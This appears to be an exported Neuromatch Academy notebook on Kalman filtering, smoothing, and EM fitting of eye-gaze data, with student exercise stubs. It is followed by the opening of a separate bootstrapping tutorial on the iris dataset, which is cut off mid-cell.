# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W3D2_HiddenDynamics/solutions/W3D2_Tutorial3_Solution_8cfee88d.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=1133 height=414 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W3D2_HiddenDynamics/static/W3D2_Tutorial3_Solution_8cfee88d_1.png>
#
#
# + [markdown] colab_type="text"
# ### Interactive Demo: Adjusting System Dynamics
# To test your understanding of the parameters of a linear dynamical system, think about what you would expect if you made the following changes:
# 1. Reduce observation noise $R$
# 2. Increase respective temporal dynamics $F$
#
# Use the interactive widget below to vary the values of $R$ and $F$.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["b2671333e42c4a07be594f4f53c4b6c7", "9b9135ad6238416bbfa2aa9ceac9afac", "8510497ffc714be5a60f51763ac70d96", "<KEY>", "1ad4749667784b2ebd5d8de21a468764", "<KEY>", "03da26b0bb51475aa305b83e9b142068", "f9c9bcc9628941c8afcceebb3605ee4e", "300ef992f1224dd6ad0e900aacbdca29", "bf9934dbb2d443c2a9597c260428ece4"]} colab_type="code" outputId="4f254285-617a-4bdd-d605-c2559797aaaf"
#@title
#@markdown Make sure you execute this cell to enable the widget!

# Interactive sweep over observation noise R and dynamics strength F:
# re-samples and re-plots the LDS each time a slider moves.
@widgets.interact(R=widgets.FloatLogSlider(0.1, min=-3, max=1),
                  F=widgets.FloatSlider(0.5, min=0.0, max=1.0))
def explore_dynamics(R=0.1, F=0.5):
    """Sample and plot an LDS trajectory for the chosen observation-noise
    scale R and state-transition gain F."""
    params = {
        'F': F * np.eye(n_dim_state),  # state transition matrix
        'Q': np.eye(n_dim_obs),  # state noise covariance
        'H': np.eye(n_dim_state),  # observation matrix
        'R': R * np.eye(n_dim_obs),  # observation noise covariance
        'mu_0': np.zeros(n_dim_state),  # initial state mean
        'sigma_0': 0.1 * np.eye(n_dim_state),  # initial state noise covariance
    }

    state, obs = sample_lds(100, params)
    plot_kalman(state, obs, title='sample')
# + [markdown] colab_type="text"
# ---
# # Section 2: Kalman Filtering
#
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="fc6da9d9-10af-48e7-a00b-23165bee554e"
#@title Video 3: Kalman Filtering
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="VboZOV9QMOI", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# We want to infer the latent state variable $s_t$ given the measured (observed) variable $y_t$.
#
# $$P(s_t|y_1, ..., y_t, y_{t+1}, ..., y_T)\sim N(\hat{\mu_t}, \hat{\Sigma_t})$$
# + [markdown] colab_type="text"
# First we obtain estimates of the latent state by running the filtering from $n=0,....N$.
# + [markdown] colab_type="text"
# $$s_t^{pred}\sim N(\hat{\mu}_t^{pred},\hat{\Sigma}_t^{pred})$$
#
# Where $\hat{\mu}_t^{pred}$ and $\hat{\Sigma}_t^{pred}$ are derived as follows:
#
# \begin{eqnarray}
# \hat{\mu}_1^{pred} & = & F\hat{\mu}_{0} \\
# \hat{\mu}_t^{pred} & = & F\hat{\mu}_{t-1}
# \end{eqnarray}
#
# *this is the prediction for $s_t$ obtained simply by taking the expected value of $s_{t-1}$ and projecting it forward one step using the state-transition matrix $F$*
#
# \begin{eqnarray}
# \hat{\Sigma}_0^{pred} & = & F\hat{\Sigma}_{0}F^T+Q \\
# \hat{\Sigma}_t^{pred} & = & F\hat{\Sigma}_{t-1}F^T+Q
# \end{eqnarray}
#
# *same for the covariance taking into account the noise covariance $Q$*
#
# update from observation to obtain $\hat{\mu}_t^{filter}$ and $\hat{\Sigma}_t^{filter}$
#
# project to observational space:
# $$y_t^{pred}\sim N(H\hat{\mu}_t^{pred}, H\hat{\Sigma}_t^{pred}H^T+R)$$
#
# update prediction by actual data:
#
# \begin{eqnarray}
# s_t^{filter} & \sim & N(\hat{\mu}_t^{filter}, \hat{\Sigma}_t^{filter}) \\
# \hat{\mu}_t^{filter} & = & \hat{\mu}_t^{pred}+K_t(y_t-H\hat{\mu}_t^{pred}) \\
# \hat{\Sigma}_t^{filter} & = & (I-K_tH)\hat{\Sigma}_t^{pred}
# \end{eqnarray}
#
# Kalman gain matrix:
# $$K_t=\hat{\Sigma}_t^{pred}H^T(H\hat{\Sigma}_t^{pred}H^T+R)^{-1}$$
#
# *we use the latent-only prediction to project it to the observational space and compute a correction proportional to the error $y_t-HF\hat{\mu}_{t-1}$ between prediction and data; the coefficient of this correction is the Kalman gain matrix*
#
# *if measurement noise is small and dynamics are fast -> estimation will depend mostly on observed data*
# + [markdown] colab_type="text"
# In order to explore the impact of filtering, we will use the following noisy periodic system:
# + colab={"base_uri": "https://localhost:8080/", "height": 465} colab_type="code" outputId="b94ffc1d-b996-4b7d-a0ab-d85f3edff3fc"
# task dimensions
n_dim_state = 2
n_dim_obs = 2

# initialize model parameters for a noisy oscillatory system
# (the 2*pi/20 term suggests a ~20-step period with 0.9 damping)
params = {
    'F': np.array([[1., 1.], [-(2*np.pi/20.)**2., .9]]),  # state transition matrix
    'Q': np.eye(n_dim_obs),  # state noise covariance
    'H': np.eye(n_dim_state),  # observation matrix
    'R': 1.0 * np.eye(n_dim_obs),  # observation noise covariance
    'mu_0': np.zeros(n_dim_state),  # initial state mean
    'sigma_0': 0.1 * np.eye(n_dim_state),  # initial state noise covariance
}

# Sample and visualize a trajectory from this periodic system.
state, obs = sample_lds(100, params)
plot_kalman(state, obs, title='sample')
# + [markdown] colab_type="text"
# ## Exercise 2: Implement Kalman filtering
# In this exercise you will implement the Kalman filter (forward) process. Your focus will be on writing the expressions for the Kalman gain, filter mean, and filter covariance at each time step (refer to the equations above).
# + colab={} colab_type="code"
def kalman_filter(data, params):
    """Run the Kalman forward (filtering) pass over a sequence of
    observations (student exercise: the update step is left for you).

    Args:
      data (ndarray): observations, shape (n_timesteps, n_dim_obs)
      params (dict): model parameters (F, Q, H, R, mu_0, sigma_0)

    Returns:
      ndarray, ndarray: filtered state means and noise covariances
    """
    # Unpack the dynamics for convenience.
    F, Q = params['F'], params['Q']
    H, R = params['H'], params['R']

    dim_state = F.shape[0]
    dim_obs = H.shape[0]
    I = np.eye(dim_state)  # identity matrix

    # One filtered mean / covariance entry per observation.
    mu = np.zeros((len(data), dim_state))
    sigma = np.zeros((len(data), dim_state, dim_state))

    for t, y in enumerate(data):
        # Predict: propagate the previous estimate through the dynamics
        # (the prior mu_0 / sigma_0 seed the very first step).
        if t == 0:
            mu_pred = params['mu_0']
            sigma_pred = params['sigma_0']
        else:
            mu_pred = F @ mu[t-1]
            sigma_pred = F @ sigma[t-1] @ F.T + Q

        ###########################################################################
        ## TODO for students: compute the filtered state mean and covariance values
        # Fill out function and remove
        raise NotImplementedError("Student excercise: compute the filtered state mean and covariance values")
        ###########################################################################

        # write the expression for computing the Kalman gain
        K = ...
        # write the expression for computing the filtered state mean
        mu[t] = ...
        # write the expression for computing the filtered state noise covariance
        sigma[t] = ...

    return mu, sigma
# Uncomment below to test your function
# filtered_state_means, filtered_state_covariances = kalman_filter(obs, params)
# plot_kalman(state, obs, filtered_state_means, title="my kf-filter",
# color='r', label='my kf-filter')
# + [markdown] colab={"base_uri": "https://localhost:8080/", "height": 465} colab_type="text" outputId="20b04ce7-d931-491a-eca4-cea96f368cb8"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W3D2_HiddenDynamics/solutions/W3D2_Tutorial3_Solution_e9df5afe.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=1133 height=414 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W3D2_HiddenDynamics/static/W3D2_Tutorial3_Solution_e9df5afe_0.png>
#
#
# + [markdown] colab_type="text"
# ---
# # Section 3: Fitting Eye Gaze Data
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="a08ca0cf-a0f1-4294-8da0-3c2af19d4a99"
#@title Video 4: Fitting Eye Gaze Data
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="M7OuXmVWHGI", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# Tracking eye gaze is used in both experimental and user interface applications. Getting an accurate estimation of where someone is looking on a screen in pixel coordinates can be challenging, however, due to the various sources of noise inherent in obtaining these measurements. A main source of noise is the general accuracy of the eye tracker device itself and how well it maintains calibration over time. Changes in ambient light or subject position can further reduce accuracy of the sensor. Eye blinks introduce a different form of noise as interruptions in the data stream which also need to be addressed.
#
# Fortunately we have a candidate solution for handling noisy eye gaze data in the Kalman filter we just learned about. Let's look at how we can apply these methods to a small subset of data taken from the [MIT Eyetracking Database](http://people.csail.mit.edu/tjudd/WherePeopleLook/index.html) [[Judd et al. 2009](http://people.csail.mit.edu/tjudd/WherePeopleLook/Docs/wherepeoplelook.pdf)]. This data was collected as part of an effort to model [visual saliency](http://www.scholarpedia.org/article/Visual_salience) -- given an image, can we predict where a person is most likely going to look.
# + colab={} colab_type="code"
# load eyetracking data
subjects, images = load_eyetracking_data()
# + [markdown] colab_type="text"
# ## Interactive Demo: Tracking Eye Gaze
#
# We have three stimulus images and five different subjects' gaze data. Each subject fixated in the center of the screen before the image appeared, then had a few seconds to freely look around. You can use the widget below to see how different subjects visually scanned the presented image. A subject ID of -1 will show the stimulus images without any overlayed gaze trace.
#
# Note that the images are rescaled below for display purposes, they were in their original aspect ratio during the task itself.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["0e4c9c199636484aa4b2106faa4012b6", "bba792b331664ab5926612b0b0fede60", "d8bad2fdd3c045c9862e04daed8bb245", "e90426f956c842fba2d0e50cec1bcdb2", "f3ef359b2564474dbf04c9f02adfbec1", "fb8f5cea2b404b2fb63c51f75911f282", "77d507c867b1409288c08c6eb737a3c6", "21b5ad8c052742f59639fd70d9259e1a", "7e4f22dd4235408794e8026dc08c2d4c", "503b4fe7160240d1873848f5e1fbee87"]} colab_type="code" outputId="cebabe02-d9fa-4026-98f1-9872850bbc3a"
#@title
#@markdown Make sure you execute this cell to enable the widget!

# Browse raw gaze traces: pick a subject (-1 = stimulus only) and an image.
@widgets.interact(subject_id=widgets.IntSlider(-1, min=-1, max=4),
                  image_id=widgets.IntSlider(0, min=0, max=2))
def plot_subject_trace(subject_id=-1, image_id=0):
    """Overlay one subject's gaze samples on one stimulus image."""
    if subject_id == -1:
        # Sentinel: empty gaze arrays so only the image is drawn.
        subject = np.zeros((3, 0, 2))
    else:
        subject = subjects[subject_id]

    data = subject[image_id]
    img = images[image_id]

    fig, ax = plt.subplots()
    ax.imshow(img, aspect='auto')
    ax.scatter(data[:, 0], data[:, 1], c='m', s=100, alpha=0.7)
    # Flip y so pixel row 0 is at the top (image coordinates).
    ax.set(xlim=(0, img.shape[1]), ylim=(img.shape[0], 0))
# + [markdown] colab_type="text"
# ## Section 3.1: Fitting data with `pykalman`
#
# Now that we have data, we'd like to use Kalman filtering to give us a better estimate of the true gaze. Up until this point we've known the parameters of our LDS, but here we need to estimate them from data directly. We will use the `pykalman` package to handle this estimation using the EM algorithm.
#
# Before exploring fitting models with `pykalman` it's worth pointing out some naming conventions used by the library:
#
# $$
# \begin{align}
# F &: \texttt{transition_matrices} &
# Q &: \texttt{transition_covariance}\\
# H &:\texttt{observation_matrices} &
# R &:\texttt{observation_covariance}\\
# \mu_0 &: \texttt{initial_state_mean} & \Sigma_0 &: \texttt{initial_state_covariance}
# \end{align}
# $$
# + [markdown] colab_type="text"
# The first thing we need to do is provide a guess at the dimensionality of the latent state. Let's start by assuming the dynamics line-up directly with the observation data (pixel x,y-coordinates), and so we have a state dimension of 2.
#
# We also need to decide which parameters we want the EM algorithm to fit. In this case, we will let the EM algorithm discover the dynamics parameters i.e. the $F$, $Q$, $H$, and $R$ matrices.
#
# We set up our `pykalman` `KalmanFilter` object with these settings using the code below.
# + colab={} colab_type="code"
# set up our KalmanFilter object and tell it which parameters we want to
# estimate
np.random.seed(1)

# Latent state assumed to mirror the observations: pixel (x, y).
n_dim_obs = 2
n_dim_state = 2

# em_vars lists the parameters the EM algorithm is allowed to fit (F, Q,
# H, R); the initial state mean/covariance are set by hand further below.
kf = pykalman.KalmanFilter(
    n_dim_state=n_dim_state,
    n_dim_obs=n_dim_obs,
    em_vars=['transition_matrices', 'transition_covariance',
             'observation_matrices', 'observation_covariance']
)
# + [markdown] colab_type="text"
# Because we know from the reported experimental design that subjects fixated in the center of the screen right before the image appears, we can set the initial starting state estimate $\mu_0$ as being the center pixel of the stimulus image (the first data point in this sample dataset) with a correspondingly low initial noise covariance $\Sigma_0$. Once we have everything set, it's time to fit some data.
# + colab={"base_uri": "https://localhost:8080/", "height": 225} colab_type="code" outputId="ea9d6b88-6ca3-4704-e58c-51d4efb8b25d"
# Choose a subject and stimulus image
subject_id = 1
image_id = 2
data = subjects[subject_id][image_id]

# Provide the initial states: subjects fixated at screen center (the first
# sample), so seed the filter there with a small initial covariance.
kf.initial_state_mean = data[0]
kf.initial_state_covariance = 0.1*np.eye(n_dim_state)

# Estimate the parameters from data using the EM algorithm
kf.em(data)

# Inspect the fitted dynamics matrices.
print(f'F =\n{kf.transition_matrices}')
print(f'Q =\n{kf.transition_covariance}')
print(f'H =\n{kf.observation_matrices}')
print(f'R =\n{kf.observation_covariance}')
# + [markdown] colab_type="text"
# We see that the EM algorithm has found fits for the various dynamics parameters. One thing you will note is that both the state and observation matrices are close to the identity matrix, which means the x- and y-coordinate dynamics are independent of each other and primarily impacted by the noise covariances.
#
# We can now use this model to smooth the observed data from the subject. In addition to the source image, we can also see how this model will work with the gaze recorded by the same subject on the other images as well, or even with different subjects.
#
# Below are the three stimulus images overlayed with recorded gaze in magenta and smoothed state from the filter in green, with gaze begin (orange triangle) and gaze end (orange square) markers.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 319, "referenced_widgets": ["660fcc30493b48e2979078a5a90fabd4", "fdcf83fdcfe8427fbc670bc45804d3fd", "76b462e1e9454b63a414a730d51aaa8b", "0e33aa9c1a4c4d73bdb123ef658e491e", "a9cdf64c64ef44e7b5b3ebd28efb4c11", "c13df8220f9149539275bd7e570970e5", "a173cd4dbbca47f3b38576e825ad9a85"]} colab_type="code" outputId="c5846eaa-77dc-455c-84d0-00672c4d39ba"
#@title
#@markdown Make sure you execute this cell to enable the widget!
@widgets.interact(subject_id=widgets.IntSlider(1, min=0, max=4))
def plot_smoothed_traces(subject_id=0):
    """Overlay recorded gaze and the smoothed Kalman state on each stimulus image."""
    gaze_traces = subjects[subject_id]
    fig, axs = plt.subplots(ncols=3, figsize=(18, 4))
    for trace, stimulus, axis in zip(gaze_traces, images, axs):
        axis = plot_gaze_data(trace, img=stimulus, ax=axis)
        plot_kf_state(kf, trace, axis)
# + [markdown] colab_type="text"
# Why do you think one trace from one subject was sufficient to provide a decent fit across all subjects? If you were to go back and change the subject_id and/or image_id for when we fit the data using EM, do you think the fits would be different?
#
# Finally, recall that the original task was to use this data to help develop models of visual salience. While our Kalman filter is able to provide smooth estimates of observed gaze data, it's not telling us anything about *why* the gaze is going in a certain direction. In fact, if we sample data from our parameters and plot them, we get what amounts to a random walk.
# + colab={"base_uri": "https://localhost:8080/", "height": 430} colab_type="code" outputId="45a98d8f-26bc-47de-8a92-18dbcb7e1e5c"
# Sample a synthetic trajectory of the same length from the fitted model to
# see what the learned dynamics alone produce (it amounts to a random walk).
kf_state, kf_data = kf.sample(len(data))
ax = plot_gaze_data(kf_data, img=images[2])
plot_kf_state(kf, kf_data, ax)
# + [markdown] colab_type="text"
# This should not be surprising, as we have given the model no other observed data beyond the pixels at which gaze was detected. We expect there is some other aspect driving the latent state of where to look next other than just the previous fixation location.
#
# In summary, while the Kalman filter is a good option for smoothing the gaze trajectory itself, especially if using a lower-quality eye tracker or in noisy environmental conditions, a linear dynamical system may not be the right way to approach the much more challenging task of modeling visual saliency.
#
# + [markdown] colab_type="text"
# # Bonus
# + [markdown] colab_type="text"
# ## Review on Gaussian joint, marginal and conditional distributions
# + [markdown] colab_type="text"
# Assume
#
# \begin{eqnarray}
# z & = & [x^Ty^T]^T \\
# z & = & \begin{bmatrix}x \\y\end{bmatrix}\sim N\left(\begin{bmatrix}a \\b\end{bmatrix}, \begin{bmatrix}A & C \\C^T & B\end{bmatrix}\right)
# \end{eqnarray}
#
# then the marginal distributions are
#
# \begin{eqnarray}
# x & \sim & N(a, A) \\
# y & \sim & N(b,B)
# \end{eqnarray}
#
# and the conditional distributions are
#
# \begin{eqnarray}
# x|y & \sim & N(a+CB^{-1}(y-b), A-CB^{-1}C^T) \\
# y|x & \sim & N(b+C^TA^{-1}(x-a), B-C^TA^{-1}C)
# \end{eqnarray}
#
# *important take away: given the joint Gaussian distribution we can derive the conditionals*
# + [markdown] colab_type="text"
# ## Kalman Smoothing
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="9b06ef4d-2b47-4281-8335-e49bc386a11f"
#@title Video 5: Kalman Smoothing and the EM Algorithm
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="4Ar2mYz1Nms", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# Obtain estimates by propagating from $y_T$ back to $y_0$ using results of forward pass ($\hat{\mu}_t^{filter}, \hat{\Sigma}_t^{filter}, P_t=\hat{\Sigma}_{t+1}^{pred}$)
#
# \begin{eqnarray}
# s_t & \sim & N(\hat{\mu}_t^{smooth}, \hat{\Sigma}_t^{smooth}) \\
# \hat{\mu}_t^{smooth} & = & \hat{\mu}_t^{filter}+J_t(\hat{\mu}_{t+1}^{smooth}-F\hat{\mu}_t^{filter}) \\
# \hat{\Sigma}_t^{smooth} & = & \hat{\Sigma}_t^{filter}+J_t(\hat{\Sigma}_{t+1}^{smooth}-P_t)J_t^T \\
# J_t & = & \hat{\Sigma}_t^{filter}F^T P_t^{-1}
# \end{eqnarray}
#
# This gives us the final estimate for $z_t$.
#
# \begin{eqnarray}
# \hat{\mu}_t & = & \hat{\mu}_t^{smooth} \\
# \hat{\Sigma}_t & = & \hat{\Sigma}_t^{smooth}
# \end{eqnarray}
# + [markdown] colab_type="text"
# ### Exercise 3: Implement Kalman smoothing
#
# In this exercise you will implement the Kalman smoothing (backward) process. Again you will focus on writing the expressions for computing the smoothed mean, smoothed covariance, and $J_t$ values.
# + colab={} colab_type="code"
def kalman_smooth(data, params):
    """Perform Kalman smoothing (backward pass) on the data given the provided
    system parameters.

    Args:
        data (ndarray): a sequence of observations of shape (n_timesteps, n_dim_obs)
        params (dict): a dictionary of model parameters: (F, Q, H, R, mu_0, sigma_0)

    Returns:
        ndarray, ndarray: the smoothed state means and state covariance estimates
    """
    # Pull the system matrices out of the params dict for convenience.
    F = params['F']  # state transition matrix
    Q = params['Q']  # process (state) noise covariance
    H = params['H']  # observation matrix
    R = params['R']  # observation noise covariance
    n_dim_state = F.shape[0]
    n_dim_obs = H.shape[0]
    # First run the forward pass to get the filtered means and covariances.
    mu, sigma = kalman_filter(data, params)
    # Initialize the smoothed estimates; the last time step equals the
    # filtered estimate since no future data exists beyond it.
    mu_hat = np.zeros_like(mu)
    sigma_hat = np.zeros_like(sigma)
    mu_hat[-1] = mu[-1]
    sigma_hat[-1] = sigma[-1]
    # Smooth the data by propagating backwards from t = T-2 down to t = 0.
    for t in reversed(range(len(data)-1)):
        sigma_pred = F @ sigma[t] @ F.T + Q  # predicted covariance at t+1
        ###########################################################################
        ## TODO for students: compute the smoothed state mean and covariance values
        # Fill out function and remove
        raise NotImplementedError("Student excercise: compute the smoothed state mean and covariance values")
        ###########################################################################
        # write the expression to compute the Kalman gain for the backward process
        J = ...
        # write the expression to compute the smoothed state mean estimate
        mu_hat[t] = ...
        # write the expression to compute the smoothed state noise covariance estimate
        sigma_hat[t] = ...
    return mu_hat, sigma_hat
# Uncomment once the kalman_smooth function is complete
# smoothed_state_means, smoothed_state_covariances = kalman_smooth(obs, params)
# axes = plot_kalman(state, obs, filtered_state_means, color="r",
# label="my kf-filter")
# plot_kalman(state, obs, smoothed_state_means, color="b",
# label="my kf-smoothed", axes=axes)
# + [markdown] colab={"base_uri": "https://localhost:8080/", "height": 465} colab_type="text" outputId="d07e06a3-7306-4491-fefb-b293c092b1fc"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W3D2_HiddenDynamics/solutions/W3D2_Tutorial3_Solution_a0f4822b.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=1133 height=414 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W3D2_HiddenDynamics/static/W3D2_Tutorial3_Solution_a0f4822b_0.png>
#
#
# + [markdown] colab_type="text"
# **Forward vs Backward**
#
# Now that we have implementations for both, let's compare their performance by computing the MSE between the filtered (forward) and smoothed (backward) estimated states and the true latent state.
# + colab={"base_uri": "https://localhost:8080/", "height": 52} colab_type="code" outputId="0c29490d-a511-433f-c542-bb3459f90941"
print(f"Filtered MSE: {np.mean((state - filtered_state_means)**2):.3f}")
print(f"Smoothed MSE: {np.mean((state - smoothed_state_means)**2):.3f}")
# + [markdown] colab_type="text"
# In this example, the smoothed estimate is clearly superior to the filtered one. This makes sense as the backward pass is able to use the forward pass estimates and correct them given all the data we've collected.
#
# So why would you ever use Kalman filtering alone, without smoothing? As Kalman filtering only depends on already observed data (i.e. the past) it can be run in a streaming, or on-line, setting. Kalman smoothing relies on future data as it were, and as such can only be applied in a batch, or off-line, setting. So use Kalman filtering if you need real-time corrections and Kalman smoothing if you are considering already-collected data.
# + [markdown] colab_type="text"
# ## The Expectation-Maximization (EM) Algorithm
# + [markdown] colab_type="text"
# - want to maximize $log p(y|\theta)$
#
# - need to marginalize out latent state *(which is not tractable)*
#
# $$p(y|\theta)=\int p(y,s|\theta)\,ds$$
#
# - add a probability distribution $q(s)$ which will approximate the latent state distribution
#
# $$\log p(y|\theta)=\log\int_s q(s)\frac{p(y,s|\theta)}{q(s)}\,ds$$
#
# - can be rewritten as
#
# $$\mathcal{L}(q,\theta)+KL\left(q(s)||p(s|y),\theta\right)$$
#
# - $\mathcal{L}(q,\theta)$ contains the joint distribution of $y$ and $s$
#
# - $KL(q||p)$ contains the conditional distribution of $s|y$
#
# #### Expectation step
# - parameters are kept fixed
# - find a good approximation $q(s)$: maximize lower bound $\mathcal{L}(q,\theta)$ with respect to $q(s)$
# - (already implemented Kalman filter+smoother)
#
# #### Maximization step
# - keep distribution $q(s)$ fixed
# - change parameters to maximize the lower bound $\mathcal{L}(q,\theta)$
#
# As mentioned, we have already effectively solved for the E-Step with our Kalman filter and smoother. The M-step requires further derivation, which is covered in the Appendix. Rather than having you implement the M-Step yourselves, let's instead turn to using a library that has already implemented EM for exploring some experimental data from cognitive neuroscience.
#
#
#
# + [markdown] colab_type="text"
# ### The M-step for a LDS
# *(see Bishop, chapter 13.3.2 Learning in LDS)*
# Update parameters of the probability distribution
#
# *For the updates in the M-step we will need the following posterior marginals obtained from the Kalman smoothing results* $\hat{\mu}_t^{smooth}, \hat{\Sigma}_t^{smooth}$
#
# $$
# \begin{eqnarray}
# E(s_t) &=& \hat{\mu}_t \\
# E(s_ts_{t-1}^T) &=& J_{t-1}\hat{\Sigma}_t+\hat{\mu}_t\hat{\mu}_{t-1}^T\\
# E(s_ts_{t}^T) &=& \hat{\Sigma}_t+\hat{\mu}_t\hat{\mu}_{t}^T
# \end{eqnarray}
# $$
#
# **Update parameters**
#
# Initial parameters
# $$
# \begin{eqnarray}
# \mu_0^{new}&=& E(s_0)\\
# Q_0^{new} &=& E(s_0s_0^T)-E(s_0)E(s_0^T) \\
# \end{eqnarray}
# $$
#
# Hidden (latent) state parameters
# $$
# \begin{eqnarray}
# F^{new} &=& \left(\sum_{t=2}^N E(s_ts_{t-1}^T)\right)\left(\sum_{t=2}^N E(s_{t-1}s_{t-1}^T)\right)^{-1} \\
# Q^{new} &=& \frac{1}{T-1} \sum_{t=2}^N E\big(s_ts_t^T\big) - F^{new}E\big(s_{t-1}s_{t}^T\big) - E\big(s_ts_{t-1}^T\big)F^{new}+F^{new}E\big(s_{t-1}s_{t-1}^T\big)\big(F^{new}\big)^{T}\\
# \end{eqnarray}
# $$
#
# Observable (measured) space parameters
# $$H^{new}=\left(\sum_{t=1}^N y_t E(s_t^T)\right)\left(\sum_{t=1}^N E(s_t s_t^T)\right)^{-1}$$
# $$R^{new}=\frac{1}{T}\sum_{t=1}^Ny_ty_t^T-H^{new}E(s_t)y_t^T-y_tE(s_t^T)\big(H^{new}\big)^T+H^{new}E(s_ts_t^T)\big(H^{new}\big)^T$$
# + [markdown] colab_type="text"
# ## Handling Eye Blinks
#
# In the MIT Eyetracking Database, raw tracking data includes times when the subject blinked. The way this is represented in the data stream is via negative pixel coordinate values.
#
# We could try to mitigate these samples by simply deleting them from the stream, though this introduces other issues. For instance, if each sample corresponds to a fixed time step, and you arbitrarily remove some samples, the integrity of that consistent timestep between samples is lost. It's sometimes better to flag data as missing rather than to pretend it was never there at all, especially with time series data.
#
# Another solution is to used masked arrays. In `numpy`, a [masked array](https://numpy.org/doc/stable/reference/maskedarray.generic.html#what-is-a-masked-array) is an `ndarray` with an additional embedded boolean masking array that indicates which elements should be masked. When computation is performed on the array, the masked elements are ignored. Both `matplotlib` and `pykalman` work with masked arrays, and, in fact, this is the approach taken with the data we explore in this notebook.
#
# In preparing the dataset for this notebook, the original dataset was preprocessed to set all gaze data as masked arrays, with the mask enabled for any pixel with a negative x or y coordinate.
|
tutorials/W3D2_HiddenDynamics/student/W3D2_Tutorial3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import pandas as pd
import numpy as np
import scipy.stats
import matplotlib.pyplot as plt
# # Bootstrapping (Nonparametric Inference)
# - *random sampling with replacement*
# - resampling technique to simulate drawing new samples (where repeating experiments is not feasible or possible)
# - typically, the new sample has size *n*, where *n* is the size of the original dataset
# ## Sample mean, standard error of the mean, and estimating the population mean
# +
# Load the iris data and histogram the raw sample with its mean marked.
df = pd.read_csv('../datasets/iris/iris.csv')
x = df['sepal_length'].values
x_mean = np.mean(x)
plt.hist(x, bins=10)
plt.axvline(x_mean, color='orange', label='sample mean: %.2f' % x_mean)
plt.xlabel('sepal length in cm')
plt.ylabel('count')
plt.legend(loc=1)
plt.show()
# -
# #### Standard Error (SE)
# $$SE_{\bar{x}} = \frac{s}{\sqrt{n}}$$
#
# - the standard error *SE* (or *standard error of the mean*) estimates the standard deviation (*s*) of the sample mean ($\bar{x}$)
# - i.e., the *SE* measures the variability when taking different samples from the population
# - in other words, the *SE* measures the variability between samples, whereas the sample standard deviation measures the variability within a sample
# - we use the standard error to judge how "good" our estimate of the population mean ($\mu$) is
# Standard error of the mean from the sample standard deviation
# (ddof=1 -> unbiased variance estimator).
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
print('standard error', se)
# Cross-check against scipy's built-in standard error of the mean.
scipy.stats.sem(x)
# #### Bootstrapping and estimating the population mean
def bootstrap_means(x, n_bootstrap_samples, seed=None):
    """Draw bootstrap resamples of x and return the mean of each resample.

    Every resample is drawn with replacement and has the same size as the
    original data, so the returned values ("bootstrap replicates" of the
    mean) approximate the sampling distribution of the sample mean.
    """
    rng = np.random.RandomState(seed)
    sample_size = x.shape[0]
    # One rng.choice call per replicate keeps the random stream identical
    # to an explicit loop-and-append implementation.
    return np.array([
        np.mean(rng.choice(x, size=sample_size, replace=True))
        for _ in range(n_bootstrap_samples)
    ])
# +
# Distribution of bootstrap means with only 50 resamples (still noisy).
boot_50 = bootstrap_means(x, n_bootstrap_samples=50, seed=123)
boot_mean = np.mean(boot_50)
plt.hist(boot_50, bins=10)
plt.axvline(boot_mean, color='orange', label='samples mean: %.2f' % boot_mean)
plt.xlabel('mean sepal length in cm')
plt.ylabel('count')
plt.legend(loc=2)
plt.show()
# +
# With 2500 resamples the distribution of means looks close to normal (CLT).
boot_2500 = bootstrap_means(x, n_bootstrap_samples=2500, seed=123)
boot_mean = np.mean(boot_2500)
plt.hist(boot_2500, bins=15)
plt.axvline(boot_mean, color='orange', label='samples mean: %.2f' % boot_mean)
plt.xlabel('mean sepal length in cm')
plt.ylabel('count')
plt.legend(loc=2)
plt.show()
# -
# - note: no matter how the sample is distributed, the sample mean follows a normal distribution
# Spread of the bootstrap replicates — estimates the standard error of the mean.
np.std(boot_2500, ddof=1)
# - remember, the standard deviation of the bootstrap replicates (means) estimates the standard error of the mean (which estimates the standard deviation of the population mean)
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
print('standard error', se)
def empirical_cdf(sample):
    """Return the sorted sample values and their cumulative proportions (ECDF)."""
    sorted_vals = np.sort(sample)
    n = sorted_vals.shape[0]
    # i-th sorted value has cumulative probability (i+1)/n.
    cum_props = np.arange(1, n + 1) / n
    return sorted_vals, cum_props
# Plot the empirical CDF of the bootstrap means.
ecdf_x, ecdf_y = empirical_cdf(boot_2500)
plt.scatter(ecdf_x, ecdf_y)
plt.xlabel('mean')
plt.ylabel('CDF')
# ## Confidence Intervals
# - 95% confidence interval: 95% of the sample means (if we would draw new samples / repeat the experiments) would fall within the confidence interval
# #### From bootstrap replicates:
# +
boot_2500 = bootstrap_means(x, n_bootstrap_samples=2500, seed=123)
